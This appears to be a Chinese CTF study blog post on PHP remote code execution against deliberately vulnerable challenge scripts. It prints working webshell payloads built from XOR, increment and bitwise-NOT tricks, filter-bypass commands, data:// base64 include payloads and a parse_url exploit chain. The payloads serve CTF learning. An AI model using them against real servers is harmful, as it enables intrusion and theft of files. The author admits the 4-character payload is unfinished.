从0到1，AKRCE之旅

RCE全解
观前提示: 本文章主讲php中的RCE各种方法,Java的RCE我会在未来再写一篇文章

1. 漏洞概述
2. 常见漏洞函数
   1. 系统命令执行函数
   2. bash命令
   3. 代码执行函数
3. 绕过
   1. 空格过滤:
   2. 函数过滤:
   3. 黑名单绕过:
   4. 内联执行
   5. 截取环境变量拼接
      1. 截取环境变量拼接进阶
4. 无数字字母
   1. 利用$
   2. 常规
      1. php5
         1. 异或
         2. 自增
      2. php7
         1. 异或
   3. 补充
5. 无数字字母进阶
   1. php7
   2. php5
6. 无变量RCE
7. 少字符RCE
   1. 4字符rce
   2. 3字符rce
8. 一些特殊题目
   1. 题目：2024 N1CTF 中web方向解题最多的zako（php）
   2. parseURL
      1. 第一题
      2. 第二题
      3. 第三题
      4. 第四题
      5. 第五题
      6. 第六题
9. 路漫漫其修远兮 吾将上下而求索

漏洞概述

在Web应用开发中为了灵活性、简洁性等会让应用调用代码执行函数或系统命令执行函数处理，若应用对用户的输入过滤不严，容易产生远程代码执行漏洞或系统命令执行漏洞；

常见漏洞函数

系统命令执行函数

1
2
3
4
5
6
7
8

system()：能将字符串作为OS命令执行，且返回命令执行结果；  
exec()：能将字符串作为OS命令执行，但是只返回执行结果的最后一行(约等于无回显)；  
shell_exec()：能将字符串作为OS命令执行  
passthru()：能将字符串作为OS命令执行，只调用命令不返回任何结果，但把命令的运行结果原样输出到标准输出设备上；  
popen()：打开进程文件指针  
proc_open()：与popen()类似  
pcntl_exec()：在当前进程空间执行指定程序；  
反引号``：反引号``内的字符串会被解析为OS命令  

bash命令

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26

more:一页一页的显示档案内容
less:与 more 类似
head:查看头几行
tac:从最后一行开始显示，可以看出 tac 是 cat 的反向显示
tail:查看尾几行
nl：显示的时候，顺便输出行号
od:以二进制的方式读取档案内容
vi:一种编辑器，这个也可以查看
vim:一种编辑器，这个也可以查看
sort:可以查看
uniq:可以查看
ls：查看目录
dir：查看目录
grep:
wget:
sed: 
cut:
awk:
strings:
od:
curl:
scp:
xxd:
mv: 
cp:
pwd:

代码执行函数

1
2
3
4
5
6
7

eval()：将字符串作为php代码执行；  
assert()：将字符串作为php代码执行；  
preg_replace()：正则匹配替换字符串；  
create_function()：主要创建匿名函数；  
call_user_func()：回调函数，第一个参数为函数名，第二个参数为函数的参数；  
call_user_func_array()：回调函数，第一个参数为函数名，第二个参数为函数参数的数组；  
可变函数：若变量后有括号，该变量会被当做函数名为变量值(前提是该变量值是存在的函数名)的函数执行；  

绕过

空格过滤:

函数过滤:

1
2
3
4

使用\绕过 如:ca\t fla\g
l\s
使用''绕过,如:
ca''t /flag

还可以使用通配符,*是匹配所有,比如flag.txt可以使用*.*来匹配,但是这样无法精确匹配到flag.txt,所以我们可以使用另一个通配符?,这个可以匹配单个内容,比如????.???就可以匹配到flag.txt,可以理解为万能字符

黑名单绕过:

1
2
3
4
5
6
7
8
9
10
11

var_dump()输出变量
file_get_contents() 读文件
get_defined_vars() 读变量
next() 对数组操作
array_pop() 弹出数组
rename() 重命名
eval(var_dump(scandir('/'););//读取根目录
cat `ls`//等效于打开ls目录下的文件
_被过滤可用'['代替
分号过滤使用?>闭合
show_source(next(array_reverse(scandir(pos(localeconv())))));

1
2
3
4
5
6
7
8
9

//glob伪协议读文件(适用于ls被限制):
$a='glob:///*';
$b=opendir($a);
if($b){
    while(($file=readdir($b))!==false){
        echo $file;
    }
    closedir($b);
}exit();

1
2

变量覆盖:
?rce=eval($_GET[1]);&1=phpinfo();

内联执行

echo ls
echo ${ls}
相当于把ls的结果使用echo输出

截取环境变量拼接

当所有函数都被过滤时,利用/var/www/html和/bin/sh构造函数绕过,如ls,nl
${PATH:~0}代表取环境变量最后一位,在/binzhon中就是’n’,${PWD:~0}代表取系统变量最后一位,在/var/www/html中就是l,这样即可构造出nl

截取环境变量拼接进阶

在php中有一个系统变量 PHP_CFLAGS=-fstack-protectcor-strong-fpic-fpie-o2-D_LARGEFILE_SOURCE -D_FI LE_OFFSET_BITS=64 还可以利用php的版本号,例如7.3.22 中的3来构造tac

1

${PHP_CFLAGS:${PHP_VERSION:${PHP_VERSION:~A}:~${SHLVL}}:${PHP_VERS ION:${PHP_VERSION:~A}:~${SHLVL}}}

其中${PHP_VERSION:${PHP_VERSION:~A}代表3,所以等于${PHP_CFLAGS:3:3}也就是tac

还有另外一种比较特别的思路,构造/和t,然后使用通配符构造/bin/cat

这里不知道为什么放不出来,只能贴图了

虽然大部分情况下以上内容足够完成题目,但若出现无数字字母的RCE题目就要看下面的了

无数字字母

对于一些基础的无数字字母RCE,可以使用探姬大佬的工具bashfuck

利用$

在只限制了字母数字的情况下，我们可以利用shell脚本中$的各种用法

Linux变量$_,它存储着上次程序传入的参数，比如执行echo can you get the file of tmp命令后，再执行echo $_，发现结果是tmp。
由此有大佬出来一个题目,因为要使用报错信息回显,所以加上了2>&1,预期解是?command=. /$_
原理就是用点号+空格+文件名执行一个可执行文件，等效于source可执行文件，然后我们前面echo了一次flag，flag作为了最后一个参数，因此可以用$_代替这个flag，但又因为我们这个flag不是可执行文件，因此linux就会报错，然后打印并输出这个文件里的内容，类似于用date -f越权读文件一样

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

<?php 
if(isset($_GET['command'])){
    $command = $_GET['command'];
    if(strlen($command)>5){
        die("Too Long!");
    }
    if(preg_match("/[A-Za-z0-9]+/",$command)){
        die("No letters or numbers!");
    }
    eval(system("echo you are not able to get flag;$command 2>&1"));
}else{
    highlight_file(__FILE__);
} 
?> 

常规

转载p牛的文章一些不包含数字和字母的webshell

1
2
3
4

<?php
if(!preg_match('/[a-z0-9]/is',$_GET['shell'])) {
  eval($_GET['shell']);
}

题目是这样的,非常经典的无数字字母rce,思路是要利用各种符号构造字符然后拼接函数实现rce,但php5与7中assert()函数是有区别的,在php5中,assert是一个函数,我们可以通过$f='assert';$f(phpinfo());这样的方法来动态执行任意代码。
但php7中，assert不再是函数，变成了一个语言结构（类似eval），不能再作为函数名动态执行代码，所以利用起来稍微复杂一点。但也无需过于担心，比如我们利用file_put_contents函数，同样可以用来getshell。
在p牛的文章中,他使用php5作为环境,但在我们的文章中,就必须两个同时写出(也是记录自己学习的过程)

php5

异或

使用异或构造assert，例如

1
2
3
4
5

<?php
$_=('%01'^'`').('%13'^'`').('%13'^'`').('%05'^'`').('%12'^'`').('%14'^'`'); // $_='assert';
$__='_'.('%0D'^']').('%2F'^'`').('%0E'^']').('%09'^']'); // $__='_POST';
$___=$$__;
$_($___[_]); // assert($_POST[_]);

这里放个自己写的遍历脚本,要哪个字符输入即可（可遍历所有字符）(看了大佬的文章就想要是一个个找字符也太慢了,于是就写了个脚本)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25

<?php
$input = readline("         请输入字符: ");
for ($i = 0; $i < strlen($input); $i++) {
	for ($a=0; $a <= 15; $a++){
		for ($b=0; $b <= 15; $b++){
			$current_char = $input[$i];
			$c = '%' . dechex($a) . dechex($b);
			//10进制转16进制
			$decoded = urldecode(''.$c.'');
			//两次单引号,不然没法写
			$decoded_ascii = ord($decoded);
			//求$curl解码之后的ascii数
			$backtick_ascii = ord('`');
			//求`的ascii数
			$result = $decoded_ascii ^ $backtick_ascii;
			//异或
			if (chr($result) == $current_char) {
				echo "$current_char ===> $c\n";
				continue;
			}
			
		}
	}
}
?>

自增

关于不使用位运算的方法，取反没写是没看懂QAQ

这就得借助PHP的一个小技巧，先看文档：
http://php.net/manual/zh/language.operators.increment.php
也就是说，‘a’++ => ‘b’，‘b’++ => ‘c’… 所以，我们只要能拿到一个变量，其值为a，通过自增操作即可获得a-z中所有字符。那么，如何拿到一个值为字符串’a’的变量呢？

巧了，数组（Array）的第一个字母就是大写A，而且第4个字母是小写a。也就是说，我们可以同时拿到小写和大写A，等于我们就可以拿到a-z和A-Z的所有字母。

在PHP中，如果强制连接数组和字符串的话，数组将被转换成字符串，其值为Array
再取这个字符串的第一个字母，就可以获得’A’了。利用这个技巧，编写如下webshell（因为PHP函数是大小写不敏感的，所以我们最终执行的是ASSERT($_POST[_])，无需获取小写a）：

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35

<?php
$_=[];
$_=@"$_"; // $_='Array';
$_=$_['!'=='@']; // $_=$_[0];
$___=$_; // A
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;
$___.=$__; // S
$___.=$__; // S
$__=$_;
$__++;$__++;$__++;$__++; // E 
$___.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // R
$___.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T
$___.=$__;

$____='_';
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // P
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // O
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // S
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T
$____.=$__;

$_=$$____;
$___($_[_]); // ASSERT($_POST[_]);

php7

在php7中…

不是都php7了为什么不看下面无数字字母进阶里的一行极简写法，一个非常简单的取反解法，而且基本通杀，为什么还要研究这个又费劲限制又大的东西呢

开玩笑，该写还是得写的,喜欢用哪个自己选哈

php5中有用assert动态执行的方法，但php7中没有了，而是使用($a)();这类代码动态执行函数，p牛在文章中举例可以利用file_put_contents函数getshell，这是一个能写入文件的函数，所以我们可以利用这个构造一个shell文件

异或

1
2
3
4
5
6
7
8
9
10

<?php
$_=('%06'^'`').('%09'^'`').('%0c'^'`').('%05'^'`').'_'.('%10'^'`').('%15'^'`').('%14'^'`').'_'.('%03'^'`').('%0f'^'`').('%0e'^'`').('%14'^'`').('%05'^'`').('%0e'^'`').('%14'^'`').('%13'^'`');
//$_=file_put_contents
$__=('%12'^'`').('%03'^'`').('%05'^'`').'.'.('%10'^'`').('%08'^'`').('%10'^'`');
//$__=rce.php
$___=('%10'^'`').('%08'^'`').('%10'^'`').('%09'^'`').('%0e'^'`').('%06'^'`').('%0f'^'`');
//$___=phpinfo
$____=$_($__,$___());
//$____=file_put_contents(rce.php,phpinfo());
?>

成功！

补充

来自: https://www.freebuf.com/articles/network/279563.html
这里还需要介绍一种特殊的方法，无版本限制，因为本质是用异或构造_GET然后传参rce

当 ; 被过滤时,还可以使用短标签绕过

不知道为什么放不出来代码，只能用图片了

无数字字母进阶

关于进阶版,依然还是要推荐p牛的文章,本文章也就是用自己的话重复了一遍p牛的文章而已 无字母数字webshell之提高篇

1
2
3
4
5
6
7
8
9
10
11
12
13

<?php
if(isset($_GET['code'])){
    $code = $_GET['code'];
    if(strlen($code)>35){
        die("Long.");
    }
    if(preg_match("/[A-Za-z0-9_$]+/",$code)){
        die("NO.");
    }
    eval($code);
}else{
    highlight_file(__FILE__);
}

题目如上，_和$被过滤了，而且限制长度，所以显然，上面的异或等需要使用$和_的payload用不了了，只能使用一些奇技淫巧。

php7

首先来说简单的，在php7中，可以利用($a)();这类的payload执行动态函数。
所以只需要构造一个取反后为命令的payload即可, 例如phpinfo取反后为%8F%97%8F%96%91%99%90, 那么payload为(~%8F%97%8F%96%91%99%90)(); 即可执行phpinfo()。
而如果要执行system, 则只需要在第一个括号中输入system取反, 第二个括号中输入system命令即可, 比如system(ipconfig)的payload为(~%8C%86%8C%8B%9A%92)(~%96%8F%9C%90%91%99%96%98);

这里也挂一个脚本方便转换,不可见字符进行了url编码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22

import urllib.parse

def construct_string():
    target_string = input("请输入要转换的字符: ")
    # 计算目标字符串的字节流
    target_bytes = bytes(target_string, 'latin1')
    # 计算取反后的字节流
    inverted_bytes = bytes(~byte & 0xff for byte in target_bytes)
    # 将取反后的字节流转换为字符串
    inverted_string = inverted_bytes.decode('latin1', errors='replace')
    # 对不可见字符进行 URL 编码
    encoded_string = ''.join(urllib.parse.quote(char) if char not in ' \t\n\r\f\v' else char for char in inverted_string)
    # 移除字符串中的 '%C2'
    encoded_string = encoded_string.replace('%C2', '')
    return encoded_string

def main():
    constructed_string = construct_string()
    print("result：", constructed_string)

if __name__ == "__main__":
    main()

php5

在php5中,并没有php7中那种表达方式,因此上面的payload并不可以.
在Linux中,有两个关于shell的知识点:

1. shell下可以利用.来执行任意脚本
2. Linux文件名支持用glob通配符代替

. 的作用与source一样,就是用当前shell执行一个文件,那么如果服务器上有一个我们可控的文件,就可以使用.getshell了。这个文件也很好得到，我们可以发送一个上传文件的POST包，此时PHP会将我们上传的文件保存在临时文件夹下，默认的文件名是/tmp/phpXXXXXX，文件名最后6个字符是随机的大小写字母。但若要执行这个文件,也需要字母,所以这时候就需要用到glob通配符了。但我们如果执行. /???/?????????，便会出现错误

原因是匹配到的文件太多了，因此在执行第一个文件时就会报错，所以我们必须匹配到/tmp/phpxxxxxx这个文件。
上传一个文件我们可以发现，文件名是含有大小写的，而刚才ls出来的文件并没有大写的，所以我们可以根据大写字母来下手，使用通配符匹配大写即可，翻开ascii表，可见大写字母位于@和[之间，因此我们可以使用[@-[]来匹配大写字符。

可以匹配成功。

因此我们发包传文件然后在code中输入payload即可

1

?code=?><?=`. /???/????????[@-[]`;?>

如果@被过滤,可以使用它前面的:;<=>?这几个来进行绕过虽然最后一个不一定是大写字母，但是多试几次就可以了

无变量RCE

我第一次听到这个还以为是连get的传参都没有

对于形如下图的函数,我们称之为无变量rce

1
2
3

if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) {    
    eval($_GET['code']);
}

这个表达式最大的特点就是不能出现a(xxx)的东西,只能是a(b(c()));这样的形式正则是这样的,匹配类似a()的字段,并替换为空,最后剩下;就匹配成功,如果是a(xxx)这样的格式,就会在剥离后剩下xxx所以过不了这个就需要对php的函数的积累了

php中的重要函数:
getenv():获取当前环境变量
getallheaders():获取请求头

current():返回数组中的单元,默认取第一个-----别名:pos()
next():取下一个内容
array_reverse():将原数组反置
end():取最后一个字段的内容

由上面三个函数,我们就能很轻易的取到一个数组中的任一单元

localeconv():返回一个包含本地数字和货币格式的数组,这个数组的第一个值为.
var_dump():返回变量的类型和值
scandir():约等于ls

由此我们就能轻易的列出当前目录下的所有文件:

scandir('.')=scandir(current(localeconv()))

再在外面套一个print_r()就能输出了当我们列出了所有文件,就可以配合移动的函数例如next()和end()来获取指定的文件,例如flag.php是scandir()列出的第二个值,就可以使用next(scandir('.')),锁定这个flag.php,接着使用show_source()或者highlight_file()或者readfile()输出flag.php的源代码,就成功获取到flag了

当然这只是读到了当前目录下的flag.php,如果这题需要rce呢,那么就有如下方法:

1. get_defined_vars():返回由所有已定义变量所组成的数组,可以返回传入的参数例如传参?xxx=var_dump(current(get_defined_vars()))&payload=111,就会有一个单元返回了["payload"]=>string(111)"111",接着我们只需要用到上面的next和end函数,就可以轻松获取到这个字段,接着eval()一下就能执行任意传入的字符串,例如&payload=phpinfo();就成功rce了

2. 还有另一种方法,session_start()开启一个session会话,session_id()获取http头的Cookie:PHPSESSID的值,但是session_id()中，仅允许会话 ID 中使用以下字符：a-z A-Z 0-9 , (逗号) - (减号),所以就需要使用进制转换,这里可以转换为16进制,将任意字符串转为16进制,接着在PHPSESSID中传入,再通过hex2bin()转换一下,就可以套个eval()进行RCE了例如eval(hex2bin(session_id(session_start())));

少字符RCE

目前最少应该是3字符,2字符不太可能吧…

直接说4字符吧,3字符还是太新鲜了,把4字符学会了什么5字符和7字符都可以秒了

4字符rce

题目源码

1
2
3
4
5
6
7
8
9

<?php 
highlight_file(__FILE__);

$cmd = $_POST['cmd'];

if(strlen($cmd) <= 4){
    shell_exec($cmd);
}
?>

我们都知道在linux中可以通过>1生成一个名为1的文件,而\可以当让下一行继续属于同一条命令,*星号在linuxshell中既可以当作通配符使用,也可以当作一个命令,例如直接执行*,就意味着将第一个文件名当作命令，后面的当作参数，比如有两个文件,一个名为ls,一个名为-t,那么就可以使用*执行出ls -t,但这里最大的问题是文件顺序,由于*是以第一个文件为命令,所以就必须控制ls为第一个文件这里还有一个命令是rev,可以将文件内容倒置于是我们就可以想办法通过拆分的方式构造出一个echo PD9waHAgZXZhbCgkX1BPU1RbMV0pOw==|base64 -d>1.php,cat /flag base64:PD9waHAgcGhwaW5mbygpOw==
这里的逻辑是:利用ls -t>0,写入命令至0,接着sh 0,就可以执行任意命令了,这里主要就是要构造出ls -t>0这样的格式,但如果直接试图写>ls,>\ ,>-t,>\>0,就会发现,生成的文件名的顺序是无法让我们通过*达成目的的

1
2

echo *
  >0 ls -t

所以我们必须控制ls的顺序,这里由于首字母的顺序,所以我们必须另辟蹊径,那么就要用到rev,我们只需要反着写,例如
0>t- sl

1
2

echo *
  0> sl t-

但是s是在t前面的,所以就需要给ls加参数,这里加上个h,就变成了ht-

1
2

echo *
  0> ht- sl

但我们如果在这里使用ls>v然后试图>rev反向一下并*v(这里是匹配了rev和v,echo *v的结果就是rev v)的话就会发现

1
2
3
4
5
6

*v

>0
-th
ls
v

没错啊,他自己换行了,那么如果我们想要执行这个rev后的v就会发现根本执行不了,因为不是一行的,那么就要提到dir了,dir>v的话就会并在一行,但是这五个字符超出了四个字符,那么就需要再变一下,先>dir一下,刚才我们是怎么做的,是ls>v,所以这次我们要想将文件名写入v,就要使用dir来写,那么自然就是同理

1
2
3
4
5

>dir
>f\>
>ht-
>sl
*>v

这样,当我们进行*的时候,就会执行dir f> ht- sl,结果自然就是f> ht- sl,将这个通过*>v就成功写进了一行,然后只需要>rev,就可以使用*v>0执行出rev v >0的效果,0:ls -th >f,接着只需要sh 0就可以将按时间生成的文件名写入f文件,接着只需要写弹shell的或者是cat /flag的文件名就好了,>\\这就是三个字符了,所以我们可以一个个写,这里注意,我看到很多文章里面关于空格的部分写了>\ \\但我纳了闷了这不是五字符了吗,所以空格不能这么写空格可以换成不需要转义符的${IFS}但如果要构造cat${IFS}/flag,会发现/斜线也不能用这里我卡了很久，突然想起来之前形如>x\\的格式是因为要换行，所以必须在文件名内写入\,但是就仅剩一个位置可以写字符,如果要写一些需要转义的特殊符号就五字符了,所以我们可以节约一下\,为了不换行,就只能使用dir了,也就是前面写入ls -th>f这里需要改为dir -th>f最终payload:

1
2
3
4
5
6
7
8
9
10

>dir
>f\>
>ht-
>rid
*>v
>rev
*v>0
---------到这里0文件内容为dir -th >f-----------
下面拼接cat${IFS}/flag
不是你妈的带斜线的全拼接不进去啊,寻思整个>x\\格式的结果发现sh 0的时候把反斜线给我转义了,存进去的是x\\

这他妈有问题呢，到底怎么写啊

参考:CTF限制字符长度RCE
CTF中字符长度限制下的命令执行 rce(7字符5字符4字符)汇总

3字符rce

从4字符的*v=rev v部分可以得知，当我们使用*时不仅可以当作通配符匹配文件，还可以匹配命令，那我们在三字符这里，就同样可以利用这一点去匹配

1
2
3
4
5
6
7
8
9
10
11
12

<?php​
error_reporting(0);​
if (isset($_POST['ctf_show'])) {​
    $ctfshow = $_POST['ctf_show'];​
    if (is_string($ctfshow) && strlen($ctfshow) <= 3) {​
        sleep(1);​
        system($ctfshow);​
}​
}else{​
    highlight_file(__FILE__);​
}​
?>

因为字符太少了，所以我们只能想办法读取到flag，注意到hd命令可以读取到index.php,当当前目录存在名为hd的文件时输入*d*时就等于hd index.php所以就可以试图将flag写入到index.php中从而进行一个读取所以我们只需要光速写入>cp,>hd,*p,这样就生成了一个cp命令,一个hd命令,最后的一个*p就等于cp flag.php index.php,也就是将flag.php的内容覆盖进index.php,接着只需要*d*这样光速读取index.php就可以了

上述题目环境是flag.php在当前目录下,可如果flag不在当前目录下我们就没有办法了吗,当然不是

当flag在家目录下面(/home/www-data)时,由于我们在/var/www/html,所以目录穿越是不可能的,我们就只能通过~来访问到家目录那么寻找一下有回显的两字命令就可以发现,7z是我们需要的,所以我们可以将整个家目录打包为7z文件,最后下载就可以了

1
2
3
4
5

>7z
>a
>b
echo * ~
7z a b /home/kali

这里就在当前目录生成了一个包含有/home/kali的所有文件的7z压缩包,以b命名,也就是b.7z

一些特殊题目

题目：2024 N1CTF 中web方向解题最多的zako（php）

大佬博客 2024 N1CTF Junior Web Writeup

以我这种小菜鸡的实力肯定是解不出来了，赛后看了Boogipop大神（ak了）的wp发现了这个有趣的解法，决定将它写在我的这篇文章中题目内容: 一个sh脚本,设置了白名单,只有两个函数能用ls和grep
还有一个黑名单,过滤了;&$(){}[]!@#$%^&*-和反引号(没法打这里了)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16

<?php

//something hide here
highlight_string(shell_exec("cat ".__FILE__." | grep -v preg_match | grep -v highlight"));

$cmd = $_REQUEST["__secret.xswl.io"];
if (strlen($cmd)>70) {
    	die("no, >70");
}
if (preg_match("/('|`|\n|\t|\\\$|~|@|#|;|&|\\||-|_|\\=|\\*|!|\\%|\\\^|index|execute')/is",$cmd)){
    	die("你就不能绕一下喵");
}

system("./execute.sh '".$cmd."'");

?>

这里有两层waf,一个是php里的,一个在shell中,因此,大佬选择利用grep构造一个php文件绕过

1
2
3
4

<?php
$cmd = $_REQUEST["__secret.xswl.io"];
system("./execute.sh '".$cmd."'");
?>

依次输入命令:

1
2
3

grep "<?php" inde?.php >> pop.php
grep "cmd" inde?.php >> pop.php
grep "system" inde?.php >> pop.php

然后读取一下pop.php即可了最终在pop.php中payload为ls';cat /flag',第一个'闭合了.execute.sh,然后使用;拼接命令,最终用最后一个'闭合最后的单引号原理解析: 第一行命令grep "<?php" inde?.php >> pop.php将index.php中带有<?php的一行写入pop.php中,
第二行命令将带有cmd的一行,即$cmd = $_REQUEST["__secret.xswl.io"];写入,最后用第三行将system("./execute.sh '".$cmd."'");写入完成RCE。

parseURL

这算rce吗,应该算吧

第一题

1
2

$data = parse_url($_GET['u']);​
eval($data['host']);

parse_url()函数就是解析传入的url字符串,并以数组的形式保存,而$data['host']则是取了host部分,也就是://后面的内容并进行eval,那么这里就非常好办了,随便构建一个就行e://eval($_GET[1]);/1

第二题

1
2

$data = parse_url($_GET['u']);​
include $data['host'].$data['path'];

先放payloada://data:://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgL19mKicpOz8%2b,a://与上一题没什么区别,后面是一个伪协议执行<?php system('cat /_f*');?>,这里主要讲的是两个冒号的原因,我们通过print_r(parse_url())后的结果可以发现

1
2
3
4
5
6

Array
(
    [scheme] => a
    [host] => data:
    [path] => //text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgL19mKicpOz8%2b
)

path是从第一个/开始算起,而host部分可能会认为最后一个:是分割主机名与端口的,所以不会代入到host中,那么就需要再传入一个:,也就是data::/的格式

第三题

1
2

$data = parse_url($_GET['u']);​
include $data['scheme'].$data['path'];

这里将host换成了scheme,根据上一题可以看出,scheme是://之前的部分这里经过试验,发现如果传入data:://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgL19mKicpOz8%2b那么等同于

1
2
3
4
5

Array
(
    [scheme] => data
    [path] => ://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgL19mKicpOz8%2b
)

这里与原来的wp不同,我来猜测一下这个可行的原因
scheme应该是取://之前的内容,而://之后的/之前的应该被当作host,/之后的被认为path
但是如果传入data:://a,当解析时,由于在标准的://之前还有一个:所以可能会被当作scheme:path的方式这里试验一下是

1
2
3
4
5
6
7
8
9
10
11
12
13

<?php
$url = "data:text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgL19mKicpOz8%2b";
$data = parse_url($url);
print_r($data);
?>

输出

Array
(
    [scheme] => data
    [path] => text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgL19mKicpOz8%2b
)

所以data:://就被解析为scheme=>data,path=>://,进而做到了伪协议这里给出grok的解释

1
2
3
4
5
6
7
8
9
10
11
12
13
14

2.2 PHP 源码中的实现
parse_url的实现基于 PHP 源码中的 ext/standard/url.c（php_url_parse 函数）。以下是其关键逻辑（简化为易懂的描述）：

1.查找 scheme：
    从字符串开头扫描，寻找第一个 :。
    如果找到 :，将 : 前的部分提取为 scheme（转换为小写）。
    如果后续没有 ://，则认为没有主机名，直接将 : 后的部分视为 path。
2.处理非标准 URL：
    对于没有 :// 的 URL（如 xxx:xxx），parse_url 将 : 视为 scheme 和 path 的分界点。
    它不会尝试将 xxx:xxx 中的第二个 xxx 解析为主机名，因为主机名通常需要 :// 后跟合法域名或 IP（例如 example.com 或 127.0.0.1）。

在 xxx:xxx 中：
    parse_url 看到第一个 xxx 直到 :，认为这是 scheme。
    : 后的 xxx 不符合主机名格式（没有 ://），因此被直接分配到 path。

第四题

1
2

$data = parse_url($_GET['u']);​
system($data['host']);

经过前面几题,这题已经非常简单了,只需要构造一个a://host然后在host这里写不带/的命令就可以了

1

payload=`echo 'Y2F0IC8xX2YxYWdfMXNfaDNyZQ=='|base64 -d`

这里多包裹了一下是因为不包裹只会echo出来,包裹一下才会再次执行,base64一次是因为直接cat会有/,而/后的会被解析为path,所以要避免

第五题

1
2

extract(parse_url($_GET['u']));​
include $$$$$$host;

要解这道题,必须先明白$$$$$$host的含义,我们先看这个例子

1
2
3
4

$a = 'b';
$b = 'hello';
echo $$a; // 输出: hello
这里$$a=$'b'=$b='hello'

所以我们就明白$$$$$$host的含义了

1
2
3
4
5
6
7
8
9
10

$a='hello'
$host='a'
echo $$host;//输出hello
这是两个$,那么只需要层层往上写就好了
假设 $host = '1'。
$$host = $1（假设 $1 = '2'）。
$$$host = $2（假设 $2 = '3'）。
$$$$host = $3（假设 $3 = '4'）。
$$$$$host = $4（假设 $4 = '5'）。
$$$$$$host = $5（最终值）。

所以如果我们想构造一个$$$$$$host=<?php eval($_POST[1]);?>
只需要层层构造就好了

1
2
3
4
5
6

$5='<?php eval($_POST[1]);?>';
$4 = '5';
$3 = '4';
$2 = '3';
$1 = '2';
$host='1';

但我们无法生成变量12345,那么就需要用到parse_url的东西了当url='http://127.0.0.1:8888@pass/1.php?a#aaa’时解析的结果为:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38

Array
(
    [scheme] => http
    [host] => pass
    [user] => 127.0.0.1
    [pass] => 8888
    [path] => /1.php
    [query] => a
    [fragment] => aaa
)
这里总共有七个,但是除了host需要五个,而且path必须要有/,所以将path也抛去,

所以可以构造出
$fragment='<?php system("ls /");?>';
$query = 'fragment';
$pass = 'query';
$user = 'pass';
$scheme = 'user';
$host='scheme';
所以$$$$$$host=$$$$$scheme=$$$$user=$$$pass=$$query=$fragment='<?php system("ls /");?>'
显然拼接一下即可

$scheme://$user:$pass@$host/?$query#$fragment

payload:
user://pass:query@scheme/?fragment#'<?php system("ls /");?>'

Array
(
    [scheme] => user
    [host] => scheme
    [user] => pass
    [pass] => query
    [path] => /
    [query] => fragment
    [fragment] => '<?php system("ls /");?>'
)

你以为这就出了吗,其实不然,因为这样写的话最后那个命令是不会被执行的,因为传入的是个字符串,也就是include('<?php system(whoami);?>'),内部的字符串只会被当作路径尝试加载而不会被当作php代码解析,所以要用data声明一下所以payload要改为data://,<?php system("ls /");?>,而且#要urlencode一下,也就是变为%23最终payload:
user://pass:query@scheme/1.php?fragment%23data://,<?php system('ls /');?>

第六题

最后一题了

1
2

$data = parse_url($_GET['u']);
file_put_contents($data['path'], $data['host']);

这里payload不能写<?php?>,因为?后面的内容会被当作query,奇技就是用<script language='php'>eval($_GET[1]);/1.php就可以了

题目来源:ctfshow-每周大挑战参考链接:CTFshow周末大挑战第三期官方wp

路漫漫其修远兮 吾将上下而求索

无数字字母这一块基本都是转载的p神的文章（惭愧），也是从p神的文章中学到了很多知识，这里还是必须推一下p牛的博客，篇篇文章都是知识啊
p神的博客

通过自己写了这篇文章之后，自己以后再遇到rce题就会有一个基本思路了，这几天在学校也净思考RCE这一块东西了，自己关于p神的博客整了几个脚本，对于自己的项目应该还是能有点帮助从0到1，RCEmap开发之旅

还有Boogipop爷的思路，非常有趣，利用grep将给出题目的源码写入另一个文件中以绕过index.php中的过滤，学习到了。大B哥的博客

我知道这篇文章没有写全所有的RCE的内容，但是php中的RCE题目差不多就是这些了，本人还很菜，没有一些深刻的理解，如有错误的地方，请多多指正。